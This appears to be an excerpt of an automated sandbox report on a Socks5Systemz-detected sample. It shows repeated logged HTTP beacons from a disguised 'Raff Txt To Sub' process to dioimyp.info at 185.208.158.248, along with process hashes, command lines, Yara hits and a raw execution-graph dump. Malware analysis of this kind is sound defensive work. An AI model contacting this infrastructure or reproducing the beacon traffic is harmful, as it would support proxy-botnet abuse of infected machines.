                                                                                Oct 8, 2024 22:39:59.200555086 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:59 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                53192.168.2.450057185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:59.352638006 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:00.064316988 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:59 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                54192.168.2.450058185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:40:00.188102007 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:00.899380922 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:00 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                55192.168.2.450059185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:40:01.016216993 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:01.739475965 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:01 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                56192.168.2.450060185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:40:01.864572048 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:02.568541050 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:02 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                57192.168.2.450061185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:40:02.689121962 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:03.401740074 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:03 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                58192.168.2.450062185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:40:03.518201113 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:04.218090057 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                59192.168.2.450063185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:40:04.353097916 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:05.063070059 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                60192.168.2.450064185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:40:05.191476107 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:05.937021017 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:05 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                61192.168.2.450065185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:40:06.069833040 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:06.788832903 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:06 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                62192.168.2.450066185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:40:06.910096884 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:07.620527983 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:07 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                63192.168.2.450067185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:40:07.755089998 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:08.492700100 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:08 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                64192.168.2.450068185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:40:08.646107912 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:09.353689909 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:09 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                65192.168.2.450069185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:40:09.522080898 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:10.234512091 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                66192.168.2.450070185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:40:10.365833998 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:40:11.752454996 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:40:11.752856016 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:40:11.753379107 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:40:10 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:16:38:04
                                                                                Start date:08/10/2024
                                                                                Path:C:\Users\user\Desktop\JtDj8LXROa.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\JtDj8LXROa.exe"
                                                                                Imagebase:0x400000
                                                                                File size:3'981'762 bytes
                                                                                MD5 hash:D05072998FA8197EEA94C4D66DFB89F6
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:1
                                                                                Start time:16:38:04
                                                                                Start date:08/10/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp" /SL4 $10482 "C:\Users\user\Desktop\JtDj8LXROa.exe" 3710467 52224
                                                                                Imagebase:0x400000
                                                                                File size:663'040 bytes
                                                                                MD5 hash:5EC1C51DA61B4F15B2F40339D7D1DF7C
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Target ID:2
                                                                                Start time:16:38:06
                                                                                Start date:08/10/2024
                                                                                Path:C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe" -i
                                                                                Imagebase:0x400000
                                                                                File size:3'295'744 bytes
                                                                                MD5 hash:B00E7D6666B62AB3475B654070B1BC1B
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.2987018343.0000000002D91000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 00000002.00000002.2986892779.0000000002CE3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:21.3%
                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                  Signature Coverage:2.7%
                                                                                  Total number of Nodes:1492
                                                                                  Total number of Limit Nodes:14
                                                                                  execution_graph 6036 408c40 SetLastError 6037 408c49 6036->6037 6577 409bc4 6578 409be9 6577->6578 6579 40764c InterlockedExchange 6578->6579 6580 409c11 6579->6580 6581 409c21 6580->6581 6582 409650 4 API calls 6580->6582 6583 407388 23 API calls 6581->6583 6582->6581 6584 409c33 6583->6584 6593 4073e0 SetEndOfFile 6584->6593 6587 407388 23 API calls 6588 409c49 6587->6588 6597 4073fc WriteFile 6588->6597 6591 4025ac 4 API calls 6592 409c74 6591->6592 6594 4073f0 6593->6594 6595 4073f7 6593->6595 6596 40730c 21 API calls 6594->6596 6595->6587 6596->6595 6598 407423 6597->6598 6599 40741c 6597->6599 6601 407434 6598->6601 6602 40726c 20 API calls 6598->6602 6600 40730c 21 API calls 6599->6600 6600->6598 6601->6591 6602->6601 6445 402b48 RaiseException 6446 40294a 6447 402952 6446->6447 6448 402967 6447->6448 6449 403554 4 API calls 6447->6449 6449->6447 6450 403f4a 6451 403f53 6450->6451 6452 403f5c 6450->6452 6454 403f07 6451->6454 6464 403f09 6454->6464 6455 403e9c 6457 403f3c 6455->6457 6459 403ef2 6455->6459 6466 403ea9 6455->6466 6468 403e8e 6455->6468 6457->6452 6458 403ecf 6458->6452 6462 402674 4 API calls 6459->6462 6460 403154 4 API calls 6460->6464 6462->6458 6464->6455 6464->6460 6465 403f3d 6464->6465 6477 403e9c 6464->6477 6465->6452 6466->6458 6467 402674 4 API calls 6466->6467 6467->6458 6469 403e4c 6468->6469 6470 403e67 6469->6470 6471 403e62 6469->6471 6472 403e7b 6469->6472 6475 403e78 6470->6475 6476 402674 4 API calls 6470->6476 6474 403cc8 4 API calls 6471->6474 6473 402674 4 API calls 6472->6473 6473->6475 6474->6470 6475->6459 6475->6466 6476->6475 6478 403ed7 6477->6478 6484 403ea9 6477->6484 6480 403ef2 6478->6480 6481 403e8e 4 API calls 6478->6481 6479 403ecf 6479->6464 6482 402674 4 API calls 6480->6482 6483 403ee6 6481->6483 6482->6479 6483->6480 6483->6484 6484->6479 6485 402674 4 API calls 6484->6485 6485->6479 6607 406dcb 6608 406dd8 SetErrorMode 6607->6608 6248 402ccc 6251 402cfe 6248->6251 6252 402cdd 6248->6252 6249 402d88 RtlUnwind 6250 403154 4 API calls 6249->6250 6250->6251 6252->6249 6252->6251 6253 402b28 RaiseException 6252->6253 6254 402d7f 6253->6254 6254->6249 6609 4065cc IsDBCSLeadByte 6610 4065e4 6609->6610 6611 403fcd 6612 403f07 4 API calls 6611->6612 6613 403fd6 6612->6613 6614 403e9c 4 API calls 6613->6614 6615 403fe2 6614->6615 4785 4024d0 4786 4024e4 4785->4786 4787 4024f7 4785->4787 4824 401918 RtlInitializeCriticalSection 4786->4824 4789 402518 4787->4789 4790 40250e RtlEnterCriticalSection 4787->4790 4801 402300 4789->4801 4790->4789 4793 4024ed 4795 402525 4798 402581 4795->4798 4799 402577 RtlLeaveCriticalSection 4795->4799 4797 402531 4797->4795 4831 40215c 4797->4831 4799->4798 4802 402314 4801->4802 4804 4023b8 4802->4804 4806 402335 4802->4806 4803 402344 4803->4795 4811 401fd4 4803->4811 4804->4803 4809 402455 4804->4809 4848 401d80 4804->4848 4856 401e84 4804->4856 4806->4803 4845 401b74 4806->4845 4809->4803 4852 401d00 4809->4852 4812 401fe8 4811->4812 4813 401ffb 4811->4813 4815 401918 4 API calls 4812->4815 4814 402012 RtlEnterCriticalSection 4813->4814 4818 40201c 4813->4818 4814->4818 4816 401fed 4815->4816 4816->4813 4817 401ff1 4816->4817 4821 402052 4817->4821 4818->4821 4938 401ee0 4818->4938 4821->4797 4822 402147 4822->4797 4823 40213d RtlLeaveCriticalSection 4823->4822 4825 40193c RtlEnterCriticalSection 4824->4825 4826 401946 4824->4826 4825->4826 4827 401964 LocalAlloc 4826->4827 4828 40197e 4827->4828 4829 4019c3 RtlLeaveCriticalSection 4828->4829 4830 4019cd 4828->4830 4829->4830 4830->4787 4830->4793 4832 40217a 4831->4832 4833 402175 4831->4833 4834 4021ab RtlEnterCriticalSection 4832->4834 4836 4021b5 4832->4836 4841 40217e 4832->4841 4835 401918 4 API calls 4833->4835 4834->4836 4835->4832 4837 402244 4836->4837 4838 4021c1 4836->4838 4842 402270 4836->4842 4837->4841 4843 401d80 7 API calls 4837->4843 4839 4022e3 RtlLeaveCriticalSection 4838->4839 4840 4022ed 4838->4840 4839->4840 4840->4795 4841->4795 4842->4838 4844 401d00 7 API calls 4842->4844 4843->4841 4844->4838 4846 40215c 9 API calls 4845->4846 4847 401b95 4846->4847 4847->4803 4849 401d92 4848->4849 4850 401d89 4848->4850 4849->4804 4850->4849 4851 401b74 9 API calls 4850->4851 4851->4849 4853 401d4e 4852->4853 4854 401d1e 4852->4854 4853->4854 4861 401c68 4853->4861 4854->4803 4916 401768 4856->4916 4858 401e99 4859 401ea6 4858->4859 4927 401dcc 4858->4927 4859->4804 4862 401c7a 4861->4862 4863 401c9d 4862->4863 4864 401caf 4862->4864 4874 40188c 4863->4874 4866 40188c 3 API calls 4864->4866 4867 401cad 4866->4867 4868 401cc5 4867->4868 4884 401b44 4867->4884 4868->4854 4870 401cd4 4871 401cee 4870->4871 4889 401b98 4870->4889 4894 4013a0 4871->4894 4875 4018b2 4874->4875 4883 40190b 4874->4883 4898 401658 4875->4898 4881 4018e6 4882 4013a0 LocalAlloc 4881->4882 4881->4883 4882->4883 4883->4867 4885 401b61 4884->4885 4886 401b52 4884->4886 4885->4870 4887 401d00 9 API calls 4886->4887 4888 401b5f 4887->4888 4888->4870 4890 401bab 4889->4890 4891 401b9d 4889->4891 4890->4871 4892 401b74 9 API calls 4891->4892 4893 401baa 4892->4893 4893->4871 4895 4013ab 4894->4895 4896 4012e4 LocalAlloc 4895->4896 4897 4013c6 4895->4897 4896->4897 4897->4868 4900 40168f 4898->4900 4899 4016cf 4902 40132c 4899->4902 4900->4899 4901 4016a9 VirtualFree 4900->4901 4901->4900 4903 401348 4902->4903 4910 4012e4 4903->4910 4906 40150c 4907 40153b 4906->4907 4908 401594 4907->4908 4909 401568 VirtualFree 4907->4909 4908->4881 4909->4907 4913 40128c 4910->4913 4912 4012ef 4912->4881 4912->4906 4914 401298 LocalAlloc 4913->4914 4915 4012aa 4913->4915 4914->4915 4915->4912 4915->4915 4918 401787 4916->4918 4917 401494 LocalAlloc VirtualAlloc VirtualAlloc VirtualFree 4917->4918 4918->4917 4919 40183b 4918->4919 4921 40132c LocalAlloc 4918->4921 4922 401821 4918->4922 4923 4017d6 4918->4923 4924 4017e7 4919->4924 4934 4015c4 4919->4934 4921->4918 4925 40150c VirtualFree 4922->4925 4926 40150c VirtualFree 4923->4926 4924->4858 4925->4924 4926->4924 4928 401d80 9 API calls 4927->4928 4929 401de0 4928->4929 4930 40132c LocalAlloc 4929->4930 4931 401df0 4930->4931 4932 401df8 4931->4932 4933 401b44 9 API calls 4931->4933 4932->4859 4933->4932 4935 40160a 4934->4935 4936 40163a 4935->4936 4937 401626 VirtualAlloc 4935->4937 4936->4924 4937->4935 4937->4936 4939 401ef0 4938->4939 4940 401f1c 4939->4940 4943 401f40 4939->4943 4944 401e58 4939->4944 4941 401d00 9 API calls 4940->4941 4940->4943 4941->4943 4943->4822 4943->4823 4949 4016d8 4944->4949 4947 401dcc 9 API calls 4948 401e75 4947->4948 4948->4939 4953 4016f4 4949->4953 4950 4016fe 4952 4015c4 VirtualAlloc 4950->4952 4957 40170a 4952->4957 4953->4950 4954 40175b 4953->4954 4955 40132c LocalAlloc 4953->4955 4956 40174f 4953->4956 4959 401430 4953->4959 4954->4947 4954->4948 4955->4953 4958 40150c VirtualFree 4956->4958 4957->4954 4958->4954 4960 40143f VirtualAlloc 4959->4960 4962 40146c 4960->4962 4963 40148f 4960->4963 4964 4012e4 LocalAlloc 4962->4964 4963->4953 4965 401478 4964->4965 4965->4963 4966 40147c VirtualFree 4965->4966 4966->4963 6490 408b50 6493 408a20 6490->6493 6495 408a29 6493->6495 6494 403198 4 API calls 6494->6495 6495->6494 6496 408a37 6495->6496 6053 403a52 6054 403a74 